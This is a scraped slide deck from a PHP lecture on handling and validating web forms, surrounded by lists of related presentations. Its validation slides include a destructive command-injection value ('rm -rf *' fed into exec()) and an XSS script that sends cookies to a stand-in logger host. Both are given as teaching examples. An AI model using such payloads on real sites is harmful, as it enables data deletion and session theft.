SlideShare a Scribd company logo

Php and web forms

sana mateen
sana mateen

These pages will show how to process PHP forms with security in mind. Proper validation of form data is important to protect your form from hackers and spammers!

1 of 16
PHP AND WEB FORMS BY SANA MATEEN
Introduction • What makes the web so interesting and useful is its ability to disseminate information as well as collect it, the latter of which is accomplished primarily through an HTML-based form. • These forms are used to encourage site feedback, facilitate forum conversations, collect mailing and billing addresses for online orders, and much more. • But coding the HTML form is only part of what’s required to effectively accept user input; a server- side component must be ready to process the input. Using PHP for this purpose is the subject of this section. • There are two common methods for passing data from one script to another: GET and POST. • Although GET is the default, you’ll typically want to use POST because it’s capable of handling considerably more data, an important characteristic when you’re using forms to insert and modify large blocks of text. • If you use POST, any posted data sent to a PHP script must be referenced using the $_POST
Php and web forms
Validating Form Data • These pages will show how to process PHP forms with security in mind. Proper validation of form data is important to protect your form from hackers and spammers! • The first attack results in the deletion of valuable site files, and the second attack results in the hijacking of a random user’s identity through an attack technique known as cross-site scripting. • File Deletion • To illustrate just how ugly things could get if you neglect validation of user input, suppose that your application requires that user input be passed to some sort of legacy command-line application called inventory_manager. • Executing such an application by way of PHP requires use of a command execution function such as exec() or system(), • The inventory_manager application accepts as input the SKU of a particular product and a recommendation for the number of products that should be reordered. For example, suppose the cherry cheesecake has been particularly popular lately, resulting in a rapid depletion of cherries. The pastry chef might use the application to order 50 more jars of cherries (SKU 50XCH67YU), resulting in the following call to inventory_manager: • $sku = "50XCH67YU"; $inventory = "50"; exec("/usr/bin/inventory_manager ".$sku." ".$inventory);
• Now suppose the pastry chef has become deranged from an overabundance of oven fumes and attempts to destroy the web site by passing the following string in as the recommended quantity to reorder: • 50; rm -rf * • This results in the following command being executed in exec(): • exec("/usr/bin/inventory_manager 50XCH67YU 50; rm -rf *"); • The inventory_manager application would indeed execute as intended but would be immediately followed by an attempt to recursively delete every file residing in the directory where the executing PHP script resides. • Cross-Site Scripting • There’s another type of attack that is considerably more difficult to recover from—because it involves the betrayal of users who have placed trust in the security of your web site. Known as cross-site scripting, this attack involves the insertion of malicious code into a page frequented by other users (e.g., an online bulletin board). • Merely visiting this page can result in the transmission of data to a third party’s site, which could allow the attacker to later return and impersonate the unwitting visitor. • Suppose that an online clothing retailer offers registered customers the opportunity to discuss the latest fashion trends in an electronic forum. In the company’s haste to bring the custom- built forum online, it decided to skip sanitization of user input, figuring it could take care of such matters at a later point in time. • One unscrupulous customer attempts to retrieve the session keys (stored in cookies) of other customers in order to subsequently enter their accounts. • To see just how easy it is to retrieve cookie data, navigate to a popular web site such as Yahoo! or Google and enter the following into the browser address bar:
Using JavaScript, the attacker can take advantage of unchecked input by embedding a similar command into a web page and quietly redirecting the information to some script capable of storing it in a text file or a database. The attacker then uses the forum’s comment-posting tool to add the following string to the forum page: <script> document.location = 'http://www.example.org/logger.php?cookie=' + document.cookie </script>
Stripping Tags from User Input 1. Sometimes it is best to completely strip user input of all HTML input, regardless of intent. The introduction of HTML tags into a message board could alter the display of the page, causing it to be displayed incorrectly or not at all. This problem can be eliminated by passing the user input through strip_tags(), which removes all HTML tags from a string. Its prototype follows: 2. string strip_tags(string str [, string allowed_tags])
Validating and Sanitizing Data with the Filter Extension Filter extension, you can use these new features to not only validate data such as an e- mail addresses so it meets stringent requirements, but also to sanitize data, altering it to fit specific criteria without requiring the user to take further actions. To validate data using the Filter extension, you’ll choose from one of seven available filter types, passing the type and target data to the filter_var() function. For instance, to validate an e-mail address you’ll pass the FILTER_VALIDATE_EMAIL flag as demonstrated here:
Php and web forms
Sanitizing Data with the Filter Extension It’s also possible to use the Filter component to sanitize data, which can be useful when processing user input intended to be posted in a forum or blog comments. For instance, to remove all tags from a string, you can use the FILTER_SANITIZE_STRING:
Working with Multivalued Form Components • Multivalued form components such as checkboxes and multiple-select boxes greatly enhance your webbased data-collection capabilities because they enable the user to simultaneously select multiple values for a given form item. • For example, consider a form used to gauge a user’s computer-related interests. Specifically, you would like to ask the user to indicate those programming languages that interest him. • Using a few text fields along with a multiple-select box, this form might look similar to that shown below.
To make PHP recognize that several values may be assigned to a single form variable, you need to make a minor change to the form item name, appending a pair of square brackets to it. Therefore, instead of languages, the name would read languages[]. Once renamed, PHP will treat the posted variable just like any other array.
Taking Advantage of PEAR: HTML_QuickForm2 • Matters can quickly become complicated and error- prone when validation and more sophisticated processing enter the picture. • One such solution is the HTML_QuickForm2 package, available through the PEAR repository. • Installing HTML_QuickForm2 • To take advantage of HTML_QuickForm2’s features, you need to install it from PEAR. Because it depends on HTML_Common2, another PEAR package capable of displaying and manipulating HTML code, you need to install HTML_Common2 also, which is done automatically by passing the -onlyreqdeps flag to the install command. Note that at the time of this writing HTML_QuickForm2 is deemed to be an alpha release, so you’ll need to append -alpha to the end of the package name.
PEAR - PHP Extension and Application Repository Stig S. Bakken founded the PEAR project in 1999 to promote the re-use of code that performs common functions. The project seeks to provide a structured library of code, maintain a system for distributing code and for managing code packages, and promote a standard coding style. A PEAR package is distributed as a gzipped tar file. Each archive consists of source code written in PHP, usually in an object-oriented style. Many PEAR packages can readily be used by developers as ordinary third party code via simple include statements in PHP. More elegantly, the PEAR package manager which comes with PHP by default may be used to install PEAR packages so that the extra functionality provided by the package appears as an integrated part of the PHP installation.
Creating and Validating a Simple Form • Creating a form and validating form input is a breeze using HTML_QuickForm2. It can dramatically reduce the amount of code you need to write to perform even complex form validation, while simultaneously continuing to provide the designer with enough flexibility to stylize the form using CSS.
Php and web forms
Ad

Recommended

Mail
MailMail
Mail
sana mateen
 
Php forms
Php formsPhp forms
Php forms
Anne Lee
 
PHP Making Web Forms
PHP Making Web FormsPHP Making Web Forms
PHP Making Web Forms
krishnapriya Tadepalli
 
HTML Forms
HTML FormsHTML Forms
HTML Forms
Ravinder Kamboj
 
2. HTML forms
2. HTML forms2. HTML forms
2. HTML forms
Pavle Đorđević
 
html forms
html formshtml forms
html forms
ikram niaz
 
Php forms and validations by naveen kumar veligeti
Php forms and validations by naveen kumar veligetiPhp forms and validations by naveen kumar veligeti
Php forms and validations by naveen kumar veligeti
Naveen Kumar Veligeti
 
Web design - Working with forms in HTML
Web design - Working with forms in HTMLWeb design - Working with forms in HTML
Web design - Working with forms in HTML
Mustafa Kamel Mohammadi
 
HTML Forms
HTML FormsHTML Forms
HTML Forms
Nisa Soomro
 
PHP Form Validation Technique
PHP Form Validation TechniquePHP Form Validation Technique
PHP Form Validation Technique
Morshedul Arefin
 
Form using html and java script validation
Form using html and java script validationForm using html and java script validation
Form using html and java script validation
Maitree Patel
 
HTML Forms Tutorial
HTML Forms TutorialHTML Forms Tutorial
HTML Forms Tutorial
ProdigyView
 
HTML5 - Forms
HTML5 - FormsHTML5 - Forms
HTML5 - Forms
tina1357
 
Html forms
Html formsHtml forms
Html forms
eShikshak
 
Html forms
Html formsHtml forms
Html forms
nobel mujuji
 
Html form tag
Html form tagHtml form tag
Html form tag
shreyachougule
 
New Form Element in HTML5
New Form Element in HTML5New Form Element in HTML5
New Form Element in HTML5
Zahra Rezwana
 
Html forms
Html formsHtml forms
Html forms
Himanshu Pathak
 
Html5
Html5Html5
Html5
Nadia Nahar
 
Forms with html5 (1)
Forms with html5 (1)Forms with html5 (1)
Forms with html5 (1)
Anada Kale
 
Handling User Input and Processing Form Data
Handling User Input and Processing Form DataHandling User Input and Processing Form Data
Handling User Input and Processing Form Data
Nicole Ryan
 
20 html-forms
20 html-forms20 html-forms
20 html-forms
Kumar
 
Forms in html5
Forms in html5Forms in html5
Forms in html5
hrisi87
 
html 5 new form attribute
html 5 new form attributehtml 5 new form attribute
html 5 new form attribute
Priyanka Rasal
 
Web engineering - HTML Form
Web engineering - HTML FormWeb engineering - HTML Form
Web engineering - HTML Form
Nosheen Qamar
 
Entering User Data from a Web Page HTML Forms
Entering User Data from a Web Page HTML FormsEntering User Data from a Web Page HTML Forms
Entering User Data from a Web Page HTML Forms
sathish sak
 
Form Validation in JavaScript
Form Validation in JavaScriptForm Validation in JavaScript
Form Validation in JavaScript
Ravi Bhadauria
 
Chapter 07 php forms handling
Chapter 07 php forms handlingChapter 07 php forms handling
Chapter 07 php forms handling
Dhani Ahmad
 
contentDM
contentDMcontentDM
contentDM
spacecowboyian
 
Migrating Very Large Site Collections (SPSDC)
Migrating Very Large Site Collections (SPSDC)Migrating Very Large Site Collections (SPSDC)
Migrating Very Large Site Collections (SPSDC)
kiwiboris
 
Ad

More Related Content

What's hot (20)

HTML Forms
HTML FormsHTML Forms
HTML Forms
Nisa Soomro
 
PHP Form Validation Technique
PHP Form Validation TechniquePHP Form Validation Technique
PHP Form Validation Technique
Morshedul Arefin
 
Form using html and java script validation
Form using html and java script validationForm using html and java script validation
Form using html and java script validation
Maitree Patel
 
HTML Forms Tutorial
HTML Forms TutorialHTML Forms Tutorial
HTML Forms Tutorial
ProdigyView
 
HTML5 - Forms
HTML5 - FormsHTML5 - Forms
HTML5 - Forms
tina1357
 
Html forms
Html formsHtml forms
Html forms
eShikshak
 
Html forms
Html formsHtml forms
Html forms
nobel mujuji
 
Html form tag
Html form tagHtml form tag
Html form tag
shreyachougule
 
New Form Element in HTML5
New Form Element in HTML5New Form Element in HTML5
New Form Element in HTML5
Zahra Rezwana
 
Html forms
Html formsHtml forms
Html forms
Himanshu Pathak
 
Html5
Html5Html5
Html5
Nadia Nahar
 
Forms with html5 (1)
Forms with html5 (1)Forms with html5 (1)
Forms with html5 (1)
Anada Kale
 
Handling User Input and Processing Form Data
Handling User Input and Processing Form DataHandling User Input and Processing Form Data
Handling User Input and Processing Form Data
Nicole Ryan
 
20 html-forms
20 html-forms20 html-forms
20 html-forms
Kumar
 
Forms in html5
Forms in html5Forms in html5
Forms in html5
hrisi87
 
html 5 new form attribute
html 5 new form attributehtml 5 new form attribute
html 5 new form attribute
Priyanka Rasal
 
Web engineering - HTML Form
Web engineering - HTML FormWeb engineering - HTML Form
Web engineering - HTML Form
Nosheen Qamar
 
Entering User Data from a Web Page HTML Forms
Entering User Data from a Web Page HTML FormsEntering User Data from a Web Page HTML Forms
Entering User Data from a Web Page HTML Forms
sathish sak
 
Form Validation in JavaScript
Form Validation in JavaScriptForm Validation in JavaScript
Form Validation in JavaScript
Ravi Bhadauria
 
Chapter 07 php forms handling
Chapter 07 php forms handlingChapter 07 php forms handling
Chapter 07 php forms handling
Dhani Ahmad
 
HTML Forms
HTML FormsHTML Forms
HTML Forms
Nisa Soomro
 
PHP Form Validation Technique
PHP Form Validation TechniquePHP Form Validation Technique
PHP Form Validation Technique
Morshedul Arefin
 
Form using html and java script validation
Form using html and java script validationForm using html and java script validation
Form using html and java script validation
Maitree Patel
 
HTML Forms Tutorial
HTML Forms TutorialHTML Forms Tutorial
HTML Forms Tutorial
ProdigyView
 
HTML5 - Forms
HTML5 - FormsHTML5 - Forms
HTML5 - Forms
tina1357
 
Html forms
Html formsHtml forms
Html forms
eShikshak
 
Html forms
Html formsHtml forms
Html forms
nobel mujuji
 
Html form tag
Html form tagHtml form tag
Html form tag
shreyachougule
 
New Form Element in HTML5
New Form Element in HTML5New Form Element in HTML5
New Form Element in HTML5
Zahra Rezwana
 
Html forms
Html formsHtml forms
Html forms
Himanshu Pathak
 
Html5
Html5Html5
Html5
Nadia Nahar
 
Forms with html5 (1)
Forms with html5 (1)Forms with html5 (1)
Forms with html5 (1)
Anada Kale
 
Handling User Input and Processing Form Data
Handling User Input and Processing Form DataHandling User Input and Processing Form Data
Handling User Input and Processing Form Data
Nicole Ryan
 
20 html-forms
20 html-forms20 html-forms
20 html-forms
Kumar
 
Forms in html5
Forms in html5Forms in html5
Forms in html5
hrisi87
 
html 5 new form attribute
html 5 new form attributehtml 5 new form attribute
html 5 new form attribute
Priyanka Rasal
 
Web engineering - HTML Form
Web engineering - HTML FormWeb engineering - HTML Form
Web engineering - HTML Form
Nosheen Qamar
 
Entering User Data from a Web Page HTML Forms
Entering User Data from a Web Page HTML FormsEntering User Data from a Web Page HTML Forms
Entering User Data from a Web Page HTML Forms
sathish sak
 
Form Validation in JavaScript
Form Validation in JavaScriptForm Validation in JavaScript
Form Validation in JavaScript
Ravi Bhadauria
 
Chapter 07 php forms handling
Chapter 07 php forms handlingChapter 07 php forms handling
Chapter 07 php forms handling
Dhani Ahmad
 

Similar to Php and web forms (20)

contentDM
contentDMcontentDM
contentDM
spacecowboyian
 
Migrating Very Large Site Collections (SPSDC)
Migrating Very Large Site Collections (SPSDC)Migrating Very Large Site Collections (SPSDC)
Migrating Very Large Site Collections (SPSDC)
kiwiboris
 
Office 365 Saturday (Sydney) - SharePoint framework – build integrated user e...
Office 365 Saturday (Sydney) - SharePoint framework – build integrated user e...Office 365 Saturday (Sydney) - SharePoint framework – build integrated user e...
Office 365 Saturday (Sydney) - SharePoint framework – build integrated user e...
Anupam Ranku
 
Codeigniter
CodeigniterCodeigniter
Codeigniter
Joram Salinas
 
Cakephp manual-11
Cakephp manual-11Cakephp manual-11
Cakephp manual-11
Aditya Pandey
 
CGI by rj
CGI by rjCGI by rj
CGI by rj
Shree M.L.Kakadiya MCA mahila college, Amreli
 
1 Introduction to Drupal Web Development
1 Introduction to Drupal Web Development1 Introduction to Drupal Web Development
1 Introduction to Drupal Web Development
Wingston
 
web2_lec6.pdf
web2_lec6.pdfweb2_lec6.pdf
web2_lec6.pdf
ssuser893014
 
CONTENT MANAGEMENT SYSTEM
CONTENT MANAGEMENT SYSTEMCONTENT MANAGEMENT SYSTEM
CONTENT MANAGEMENT SYSTEM
ANAND PRAKASH
 
Customer FX Technical Reference Sheet
Customer FX Technical Reference SheetCustomer FX Technical Reference Sheet
Customer FX Technical Reference Sheet
GoodCustomers
 
Php reports sumit
Php reports sumitPhp reports sumit
Php reports sumit
Sumit Biswas
 
Flyr PHP micro-framework
Flyr PHP micro-frameworkFlyr PHP micro-framework
Flyr PHP micro-framework
Siro Díaz Palazón
 
sample1
sample1sample1
sample1
sudipta nandi
 
Migrating very large site collections
Migrating very large site collectionsMigrating very large site collections
Migrating very large site collections
kiwiboris
 
In Act Developers Platform
In Act Developers PlatformIn Act Developers Platform
In Act Developers Platform
Eris Ristemena
 
report_vendor_connect
report_vendor_connectreport_vendor_connect
report_vendor_connect
Yash Mittal
 
Meet Magento Belarus 2015: Uladzimir Kalashnikau
Meet Magento Belarus 2015: Uladzimir KalashnikauMeet Magento Belarus 2015: Uladzimir Kalashnikau
Meet Magento Belarus 2015: Uladzimir Kalashnikau
Amasty
 
Manual 5
Manual 5Manual 5
Manual 5
arifhossen
 
Codeigniter framework
Codeigniter framework Codeigniter framework
Codeigniter framework
baabtra.com - No. 1 supplier of quality freshers
 
(ATS4-PLAT03) Balancing Security with access for Development
(ATS4-PLAT03) Balancing Security with access for Development(ATS4-PLAT03) Balancing Security with access for Development
(ATS4-PLAT03) Balancing Security with access for Development
BIOVIA
 
contentDM
contentDMcontentDM
contentDM
spacecowboyian
 
Migrating Very Large Site Collections (SPSDC)
Migrating Very Large Site Collections (SPSDC)Migrating Very Large Site Collections (SPSDC)
Migrating Very Large Site Collections (SPSDC)
kiwiboris
 
Office 365 Saturday (Sydney) - SharePoint framework – build integrated user e...
Office 365 Saturday (Sydney) - SharePoint framework – build integrated user e...Office 365 Saturday (Sydney) - SharePoint framework – build integrated user e...
Office 365 Saturday (Sydney) - SharePoint framework – build integrated user e...
Anupam Ranku
 
Codeigniter
CodeigniterCodeigniter
Codeigniter
Joram Salinas
 
Cakephp manual-11
Cakephp manual-11Cakephp manual-11
Cakephp manual-11
Aditya Pandey
 
CGI by rj
CGI by rjCGI by rj
CGI by rj
Shree M.L.Kakadiya MCA mahila college, Amreli
 
1 Introduction to Drupal Web Development
1 Introduction to Drupal Web Development1 Introduction to Drupal Web Development
1 Introduction to Drupal Web Development
Wingston
 
web2_lec6.pdf
web2_lec6.pdfweb2_lec6.pdf
web2_lec6.pdf
ssuser893014
 
CONTENT MANAGEMENT SYSTEM
CONTENT MANAGEMENT SYSTEMCONTENT MANAGEMENT SYSTEM
CONTENT MANAGEMENT SYSTEM
ANAND PRAKASH
 
Customer FX Technical Reference Sheet
Customer FX Technical Reference SheetCustomer FX Technical Reference Sheet
Customer FX Technical Reference Sheet
GoodCustomers
 
Php reports sumit
Php reports sumitPhp reports sumit
Php reports sumit
Sumit Biswas
 
Flyr PHP micro-framework
Flyr PHP micro-frameworkFlyr PHP micro-framework
Flyr PHP micro-framework
Siro Díaz Palazón
 
sample1
sample1sample1
sample1
sudipta nandi
 
Migrating very large site collections
Migrating very large site collectionsMigrating very large site collections
Migrating very large site collections
kiwiboris
 
In Act Developers Platform
In Act Developers PlatformIn Act Developers Platform
In Act Developers Platform
Eris Ristemena
 
report_vendor_connect
report_vendor_connectreport_vendor_connect
report_vendor_connect
Yash Mittal
 
Meet Magento Belarus 2015: Uladzimir Kalashnikau
Meet Magento Belarus 2015: Uladzimir KalashnikauMeet Magento Belarus 2015: Uladzimir Kalashnikau
Meet Magento Belarus 2015: Uladzimir Kalashnikau
Amasty
 
Manual 5
Manual 5Manual 5
Manual 5
arifhossen
 
Codeigniter framework
Codeigniter framework Codeigniter framework
Codeigniter framework
baabtra.com - No. 1 supplier of quality freshers
 
(ATS4-PLAT03) Balancing Security with access for Development
(ATS4-PLAT03) Balancing Security with access for Development(ATS4-PLAT03) Balancing Security with access for Development
(ATS4-PLAT03) Balancing Security with access for Development
BIOVIA
 
Ad

More from sana mateen (20)

Files
FilesFiles
Files
sana mateen
 
PHP Variables and scopes
PHP Variables and scopesPHP Variables and scopes
PHP Variables and scopes
sana mateen
 
Php intro
Php introPhp intro
Php intro
sana mateen
 
Files in php
Files in phpFiles in php
Files in php
sana mateen
 
File upload php
File upload phpFile upload php
File upload php
sana mateen
 
Regex posix
Regex posixRegex posix
Regex posix
sana mateen
 
Encryption in php
Encryption in phpEncryption in php
Encryption in php
sana mateen
 
Authentication methods
Authentication methodsAuthentication methods
Authentication methods
sana mateen
 
Xml schema
Xml schemaXml schema
Xml schema
sana mateen
 
Xml dtd
Xml dtdXml dtd
Xml dtd
sana mateen
 
Xml dom
Xml domXml dom
Xml dom
sana mateen
 
Xhtml
XhtmlXhtml
Xhtml
sana mateen
 
Intro xml
Intro xmlIntro xml
Intro xml
sana mateen
 
Dom parser
Dom parserDom parser
Dom parser
sana mateen
 
Unit 1-subroutines in perl
Unit 1-subroutines in perlUnit 1-subroutines in perl
Unit 1-subroutines in perl
sana mateen
 
Unit 1-uses for scripting languages,web scripting
Unit 1-uses for scripting languages,web scriptingUnit 1-uses for scripting languages,web scripting
Unit 1-uses for scripting languages,web scripting
sana mateen
 
Unit 1-strings,patterns and regular expressions
Unit 1-strings,patterns and regular expressionsUnit 1-strings,patterns and regular expressions
Unit 1-strings,patterns and regular expressions
sana mateen
 
Unit 1-scalar expressions and control structures
Unit 1-scalar expressions and control structuresUnit 1-scalar expressions and control structures
Unit 1-scalar expressions and control structures
sana mateen
 
Unit 1-perl names values and variables
Unit 1-perl names values and variablesUnit 1-perl names values and variables
Unit 1-perl names values and variables
sana mateen
 
Unit 1-introduction to scripts
Unit 1-introduction to scriptsUnit 1-introduction to scripts
Unit 1-introduction to scripts
sana mateen
 
Files
FilesFiles
Files
sana mateen
 
PHP Variables and scopes
PHP Variables and scopesPHP Variables and scopes
PHP Variables and scopes
sana mateen
 
Php intro
Php introPhp intro
Php intro
sana mateen
 
Files in php
Files in phpFiles in php
Files in php
sana mateen
 
File upload php
File upload phpFile upload php
File upload php
sana mateen
 
Regex posix
Regex posixRegex posix
Regex posix
sana mateen
 
Encryption in php
Encryption in phpEncryption in php
Encryption in php
sana mateen
 
Authentication methods
Authentication methodsAuthentication methods
Authentication methods
sana mateen
 
Xml schema
Xml schemaXml schema
Xml schema
sana mateen
 
Xml dtd
Xml dtdXml dtd
Xml dtd
sana mateen
 
Xml dom
Xml domXml dom
Xml dom
sana mateen
 
Xhtml
XhtmlXhtml
Xhtml
sana mateen
 
Intro xml
Intro xmlIntro xml
Intro xml
sana mateen
 
Dom parser
Dom parserDom parser
Dom parser
sana mateen
 
Unit 1-subroutines in perl
Unit 1-subroutines in perlUnit 1-subroutines in perl
Unit 1-subroutines in perl
sana mateen
 
Unit 1-uses for scripting languages,web scripting
Unit 1-uses for scripting languages,web scriptingUnit 1-uses for scripting languages,web scripting
Unit 1-uses for scripting languages,web scripting
sana mateen
 
Unit 1-strings,patterns and regular expressions
Unit 1-strings,patterns and regular expressionsUnit 1-strings,patterns and regular expressions
Unit 1-strings,patterns and regular expressions
sana mateen
 
Unit 1-scalar expressions and control structures
Unit 1-scalar expressions and control structuresUnit 1-scalar expressions and control structures
Unit 1-scalar expressions and control structures
sana mateen
 
Unit 1-perl names values and variables
Unit 1-perl names values and variablesUnit 1-perl names values and variables
Unit 1-perl names values and variables
sana mateen
 
Unit 1-introduction to scripts
Unit 1-introduction to scriptsUnit 1-introduction to scripts
Unit 1-introduction to scripts
sana mateen
 
Ad

Recently uploaded (20)

Grade 3 - English - Printable Worksheet (PDF Format)
Grade 3 - English - Printable Worksheet (PDF Format)Grade 3 - English - Printable Worksheet (PDF Format)
Grade 3 - English - Printable Worksheet (PDF Format)
Sritoma Majumder
 
Link your Lead Opportunities into Spreadsheet using odoo CRM
Link your Lead Opportunities into Spreadsheet using odoo CRMLink your Lead Opportunities into Spreadsheet using odoo CRM
Link your Lead Opportunities into Spreadsheet using odoo CRM
Celine George
 
Introduction-to-Communication-and-Media-Studies-1736283331.pdf
Introduction-to-Communication-and-Media-Studies-1736283331.pdfIntroduction-to-Communication-and-Media-Studies-1736283331.pdf
Introduction-to-Communication-and-Media-Studies-1736283331.pdf
james5028
 
Kasdorf "Accessibility Essentials: A 2025 NISO Training Series, Session 5, Ac...
Kasdorf "Accessibility Essentials: A 2025 NISO Training Series, Session 5, Ac...Kasdorf "Accessibility Essentials: A 2025 NISO Training Series, Session 5, Ac...
Kasdorf "Accessibility Essentials: A 2025 NISO Training Series, Session 5, Ac...
National Information Standards Organization (NISO)
 
Real GitHub Copilot Exam Dumps for Success
Real GitHub Copilot Exam Dumps for SuccessReal GitHub Copilot Exam Dumps for Success
Real GitHub Copilot Exam Dumps for Success
Mark Soia
 
How to manage Multiple Warehouses for multiple floors in odoo point of sale
How to manage Multiple Warehouses for multiple floors in odoo point of saleHow to manage Multiple Warehouses for multiple floors in odoo point of sale
How to manage Multiple Warehouses for multiple floors in odoo point of sale
Celine George
 
"Basics of Heterocyclic Compounds and Their Naming Rules"
"Basics of Heterocyclic Compounds and Their Naming Rules""Basics of Heterocyclic Compounds and Their Naming Rules"
"Basics of Heterocyclic Compounds and Their Naming Rules"
rupalinirmalbpharm
 
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
larencebapu132
 
How to Set warnings for invoicing specific customers in odoo
How to Set warnings for invoicing specific customers in odooHow to Set warnings for invoicing specific customers in odoo
How to Set warnings for invoicing specific customers in odoo
Celine George
 
YSPH VMOC Special Report - Measles Outbreak Southwest US 5-3-2025.pptx
YSPH VMOC Special Report - Measles Outbreak Southwest US 5-3-2025.pptxYSPH VMOC Special Report - Measles Outbreak Southwest US 5-3-2025.pptx
YSPH VMOC Special Report - Measles Outbreak Southwest US 5-3-2025.pptx
Yale School of Public Health - The Virtual Medical Operations Center (VMOC)
 
Stein, Hunt, Green letter to Congress April 2025
Stein, Hunt, Green letter to Congress April 2025Stein, Hunt, Green letter to Congress April 2025
Stein, Hunt, Green letter to Congress April 2025
Mebane Rash
 
How to Manage Opening & Closing Controls in Odoo 17 POS
How to Manage Opening & Closing Controls in Odoo 17 POSHow to Manage Opening & Closing Controls in Odoo 17 POS
How to Manage Opening & Closing Controls in Odoo 17 POS
Celine George
 
Sugar-Sensing Mechanism in plants....pptx
Sugar-Sensing Mechanism in plants....pptxSugar-Sensing Mechanism in plants....pptx
Sugar-Sensing Mechanism in plants....pptx
Dr. Renu Jangid
 
Exercise Physiology MCQS By DR. NASIR MUSTAFA
Exercise Physiology MCQS By DR. NASIR MUSTAFAExercise Physiology MCQS By DR. NASIR MUSTAFA
Exercise Physiology MCQS By DR. NASIR MUSTAFA
Dr. Nasir Mustafa
 
Operations Management (Dr. Abdulfatah Salem).pdf
Operations Management (Dr. Abdulfatah Salem).pdfOperations Management (Dr. Abdulfatah Salem).pdf
Operations Management (Dr. Abdulfatah Salem).pdf
Arab Academy for Science, Technology and Maritime Transport
 
Presentation on Tourism Product Development By Md Shaifullar Rabbi
Presentation on Tourism Product Development By Md Shaifullar RabbiPresentation on Tourism Product Development By Md Shaifullar Rabbi
Presentation on Tourism Product Development By Md Shaifullar Rabbi
Md Shaifullar Rabbi
 
APM Midlands Region April 2025 Sacha Hind Circulated.pdf
APM Midlands Region April 2025 Sacha Hind Circulated.pdfAPM Midlands Region April 2025 Sacha Hind Circulated.pdf
APM Midlands Region April 2025 Sacha Hind Circulated.pdf
Association for Project Management
 
Grade 2 - Mathematics - Printable Worksheet
Grade 2 - Mathematics - Printable WorksheetGrade 2 - Mathematics - Printable Worksheet
Grade 2 - Mathematics - Printable Worksheet
Sritoma Majumder
 
Odoo Inventory Rules and Routes v17 - Odoo Slides
Odoo Inventory Rules and Routes v17 - Odoo SlidesOdoo Inventory Rules and Routes v17 - Odoo Slides
Odoo Inventory Rules and Routes v17 - Odoo Slides
Celine George
 
THE STG QUIZ GROUP D.pptx quiz by Ridip Hazarika
THE STG QUIZ GROUP D.pptx quiz by Ridip HazarikaTHE STG QUIZ GROUP D.pptx quiz by Ridip Hazarika
THE STG QUIZ GROUP D.pptx quiz by Ridip Hazarika
Ridip Hazarika
 
Grade 3 - English - Printable Worksheet (PDF Format)
Grade 3 - English - Printable Worksheet (PDF Format)Grade 3 - English - Printable Worksheet (PDF Format)
Grade 3 - English - Printable Worksheet (PDF Format)
Sritoma Majumder
 
Link your Lead Opportunities into Spreadsheet using odoo CRM
Link your Lead Opportunities into Spreadsheet using odoo CRMLink your Lead Opportunities into Spreadsheet using odoo CRM
Link your Lead Opportunities into Spreadsheet using odoo CRM
Celine George
 
Introduction-to-Communication-and-Media-Studies-1736283331.pdf
Introduction-to-Communication-and-Media-Studies-1736283331.pdfIntroduction-to-Communication-and-Media-Studies-1736283331.pdf
Introduction-to-Communication-and-Media-Studies-1736283331.pdf
james5028
 
Kasdorf "Accessibility Essentials: A 2025 NISO Training Series, Session 5, Ac...
Kasdorf "Accessibility Essentials: A 2025 NISO Training Series, Session 5, Ac...Kasdorf "Accessibility Essentials: A 2025 NISO Training Series, Session 5, Ac...
Kasdorf "Accessibility Essentials: A 2025 NISO Training Series, Session 5, Ac...
National Information Standards Organization (NISO)
 
Real GitHub Copilot Exam Dumps for Success
Real GitHub Copilot Exam Dumps for SuccessReal GitHub Copilot Exam Dumps for Success
Real GitHub Copilot Exam Dumps for Success
Mark Soia
 
How to manage Multiple Warehouses for multiple floors in odoo point of sale
How to manage Multiple Warehouses for multiple floors in odoo point of saleHow to manage Multiple Warehouses for multiple floors in odoo point of sale
How to manage Multiple Warehouses for multiple floors in odoo point of sale
Celine George
 
"Basics of Heterocyclic Compounds and Their Naming Rules"
"Basics of Heterocyclic Compounds and Their Naming Rules""Basics of Heterocyclic Compounds and Their Naming Rules"
"Basics of Heterocyclic Compounds and Their Naming Rules"
rupalinirmalbpharm
 
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
larencebapu132
 
How to Set warnings for invoicing specific customers in odoo
How to Set warnings for invoicing specific customers in odooHow to Set warnings for invoicing specific customers in odoo
How to Set warnings for invoicing specific customers in odoo
Celine George
 
YSPH VMOC Special Report - Measles Outbreak Southwest US 5-3-2025.pptx
YSPH VMOC Special Report - Measles Outbreak Southwest US 5-3-2025.pptxYSPH VMOC Special Report - Measles Outbreak Southwest US 5-3-2025.pptx
YSPH VMOC Special Report - Measles Outbreak Southwest US 5-3-2025.pptx
Yale School of Public Health - The Virtual Medical Operations Center (VMOC)
 
Stein, Hunt, Green letter to Congress April 2025
Stein, Hunt, Green letter to Congress April 2025Stein, Hunt, Green letter to Congress April 2025
Stein, Hunt, Green letter to Congress April 2025
Mebane Rash
 
How to Manage Opening & Closing Controls in Odoo 17 POS
How to Manage Opening & Closing Controls in Odoo 17 POSHow to Manage Opening & Closing Controls in Odoo 17 POS
How to Manage Opening & Closing Controls in Odoo 17 POS
Celine George
 
Sugar-Sensing Mechanism in plants....pptx
Sugar-Sensing Mechanism in plants....pptxSugar-Sensing Mechanism in plants....pptx
Sugar-Sensing Mechanism in plants....pptx
Dr. Renu Jangid
 
Exercise Physiology MCQS By DR. NASIR MUSTAFA
Exercise Physiology MCQS By DR. NASIR MUSTAFAExercise Physiology MCQS By DR. NASIR MUSTAFA
Exercise Physiology MCQS By DR. NASIR MUSTAFA
Dr. Nasir Mustafa
 
Operations Management (Dr. Abdulfatah Salem).pdf
Operations Management (Dr. Abdulfatah Salem).pdfOperations Management (Dr. Abdulfatah Salem).pdf
Operations Management (Dr. Abdulfatah Salem).pdf
Arab Academy for Science, Technology and Maritime Transport
 
Presentation on Tourism Product Development By Md Shaifullar Rabbi
Presentation on Tourism Product Development By Md Shaifullar RabbiPresentation on Tourism Product Development By Md Shaifullar Rabbi
Presentation on Tourism Product Development By Md Shaifullar Rabbi
